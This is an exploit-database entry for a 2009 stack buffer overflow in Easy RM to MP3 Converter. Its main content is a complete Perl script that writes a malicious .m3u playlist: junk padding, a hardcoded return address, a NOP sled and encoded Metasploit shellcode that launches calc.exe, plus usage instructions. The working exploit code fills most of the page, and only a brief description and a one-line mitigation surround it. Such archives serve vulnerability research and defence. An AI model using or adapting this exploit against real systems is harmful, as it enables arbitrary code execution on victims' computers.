Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit

vendor:

Easy RM to MP3 Converter

by:

stack

7,5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Easy RM to MP3 Converter

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit

This exploit is for Easy RM to MP3 Converter .m3u file Universal Stack Overflow. It is different from the first exploit .pls. It is a buffer overflow exploit which uses a malicious .m3u file to execute a payload of calc.exe. The exploit is written in Perl and uses a universal return address.

Mitigation:

The user should not open any suspicious .m3u files from untrusted sources.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit
# it's so diferent to the first exploit .pls
# by stack
# xd Alpha zrebti 3liha :d
# Thnx to Zigma & His0k4 & HOD
my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
            "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
            "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
            "\x0D\x0A\x44\x3A\x5C";
  
my $junk  = "\x41" x 1293;
my $ret   = "\xDB\x70\xBB\x01"; # Universal return adress :d
my $nop   = "\x90" x 220;
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
 
$id = $ARGV[0];
if ($id==1){
print "$header$junk$ret$nop$calc_shell";
exit;
}
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++                                                              +++\n";
print " +++                                                              +++\n";
print " +++ Easy RM to MP3 Converter Universall Stack Overflow Exploit   +++\n";
print " +++ Written By Stack                                             +++\n";
print " +++                                                              +++\n";
print " +++   Usage Ex.: perl $0 1 >>Exploit.m3u                         +++\n";
print " +++                                                              +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;
#EOF

# milw0rm.com [2009-07-17]